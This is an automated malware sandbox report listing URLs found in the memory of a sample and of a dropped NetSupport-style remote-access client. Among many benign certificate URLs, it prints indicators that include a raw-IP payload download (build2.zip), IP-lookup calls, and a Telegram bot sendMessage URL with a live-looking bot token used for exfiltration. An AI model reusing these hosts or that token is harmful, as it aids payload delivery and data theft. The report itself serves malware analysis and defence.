                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 22 Feb 2025 01:46:50 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 915b4e02c9394381-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t3F9zhxsoMYfE9GVVytQFDxKCc%2FRkJqMWEMzxlAIlriLyEn4nAIY2dDYy1n1%2FCrwv93oJp7l8Fd%2FevvW7HW3iCXY0mT%2B2osXS9BdPs3kbwowbJMTekOKCGLt9tguMUBFuBba5cwcm1aaDzaU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: client32.exe, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp String found in binary or memory: http://%s/fakeurl.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp String found in binary or memory: http://%s/testpage.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp String found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: BUenB12U2a.exe, 00000001.00000002.2038640444.0000020E479F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.../back.jpeg
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://127.0.0.1
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47ECC000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E2C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://147.45.198.181/build2.zip
                                Source: BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E2C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://147.45.198.181/build2.zipacted
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234152000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 
http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234152000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: BUenB12U2a.exe, 00000001.00000002.2040252451.0000020E48098000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006023599.0000020E48099000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980198885.0000020E47975000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004767997.0000020E48097000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980369030.0000020E4794C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                Source: BUenB12U2a.exe, 00000001.00000003.2014138896.0000020E45303000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E47787000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009990846.0000020E472DD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011512056.0000020E477C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009164213.0000020E472D7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009311750.0000020E472DC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008219589.0000020E472D6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030217979.0000020E45314000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2027032182.0000020E45314000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E476F6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2016101945.0000020E45313000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2010988728.0000020E472F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: BUenB12U2a.exe, 00000001.00000003.2004739588.0000020E47961000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1979624019.0000020E4808E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011542195.0000020E47814000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009098255.0000020E47963000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038314579.0000020E47963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.2004767997.0000020E48097000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980369030.0000020E4794C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                                Source: BUenB12U2a.exe, 00000001.00000002.2040252451.0000020E48098000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004767997.0000020E48097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl&&
                                Source: BUenB12U2a.exe, 00000001.00000003.2007864176.0000020E479E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1979624019.0000020E4808E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004832717.0000020E473EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.2007864176.0000020E479E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.2007807265.0000020E47374000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008036016.0000020E47377000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2016957728.0000020E47378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crld
                                Source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E47787000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011512056.0000020E477C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E476F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.2007864176.0000020E479E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlGz
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234152000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1790469872.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: BUenB12U2a.exe, 00000001.00000003.1749010474.0000020E476F1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749010474.0000020E47698000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749618127.0000020E476F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.2025360667.0000020E48050000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2027208702.0000020E48065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                                Source: BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E47853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                                Source: BUenB12U2a.exe, 00000001.00000003.2016057686.0000020E4723E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751127839.0000020E4785D000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2017154557.0000020E4723E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1751007347.0000020E4783B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2018004144.0000020E4723F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2014516835.0000020E4723D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                                Source: BUenB12U2a.exe, 00000001.00000003.2009944197.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2015700374.0000020E470E5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008865217.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2017488484.0000020E470E6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013944849.0000020E470E4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011806951.0000020E47367000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2018402430.0000020E470E7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008082192.0000020E470E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007984529.0000020E47096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yahoo.com/
                                Source: powershell.exe, 00000003.00000002.1919245142.000001C999F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: BUenB12U2a.exe, 00000001.00000002.2039408751.0000020E47F88000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/?format=json
                                Source: BUenB12U2a.exe, 00000001.00000002.2035623903.0000020E470F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org?format=json
                                Source: BUenB12U2a.exe, 00000001.00000002.2035623903.0000020E470F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                                Source: BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7811330773:AAE5517qUHfPZHj-CuDC3r8ysOsJKklxmuQ/sendMessage
                                Source: BUenB12U2a.exe, 00000001.00000002.2038640444.0000020E479F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000003.00000002.1935654975.000001C9A9F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                                Source: BUenB12U2a.exe, 00000000.00000003.1720507885.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                                Source: BUenB12U2a.exe, 00000001.00000003.2014963354.0000020E475FC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1748207345.0000020E4736B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749653867.0000020E4736B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2027572735.0000020E47375000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007807265.0000020E47374000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2013416055.0000020E47375000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2036919019.0000020E475FC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749155705.0000020E4736B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                                Source: BUenB12U2a.exe, 00000001.00000003.1738758695.0000020E46FF1000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031861796.0000020E46BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
